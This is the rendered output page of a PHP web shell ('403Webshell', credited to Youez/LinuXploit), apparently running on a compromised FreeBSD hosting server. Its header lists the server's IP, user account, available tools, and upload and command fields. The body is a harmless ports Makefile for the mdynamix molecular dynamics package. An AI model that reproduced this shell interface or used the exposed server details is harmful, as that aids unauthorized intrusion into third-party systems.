403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/science/mdynamix/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/science/mdynamix/Makefile
PORTNAME=	mdynamix
DISTVERSION=	5.2.8
PORTREVISION=	4
CATEGORIES=	science
MASTER_SITES=	http://www.fos.su.se/~sasha/${PORTNAME}/versions/
DISTNAME=	md${DISTVERSION:S/.//g}

MAINTAINER=	yuri@FreeBSD.org
COMMENT=	General purpose molecular dynamics code
WWW=		http://www.fos.su.se/~sasha/mdynamix/

LICENSE=	GPLv2+

LIB_DEPENDS=	libmpich.so:net/mpich

USES=		fortran gmake

ALL_TARGET=	default mpi
MAKE_ARGS=	FFLAGS="${FFLAGS} -ffast-math" LDFLAGS="${LDFLAGS}"
BINARY_ALIAS=	make=gmake gfortran=gfortran${GCC_DEFAULT}

PLIST_FILES=	bin/md bin/mdp

do-install:
	${INSTALL_PROGRAM} ${WRKSRC}/md ${STAGEDIR}${PREFIX}/bin
	${INSTALL_PROGRAM} ${WRKSRC}/mdp ${STAGEDIR}${PREFIX}/bin

.include <bsd.port.pre.mk>

.if ${GCC_DEFAULT} >= 10
# workaround for Type mismatch between actual argument at (1) and actual argument at (2) (INTEGER(4)/REAL(4)).
# in theory, this should set FCFLAGS, but the port does not conform
FFLAGS+=	-fallow-argument-mismatch
.endif

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit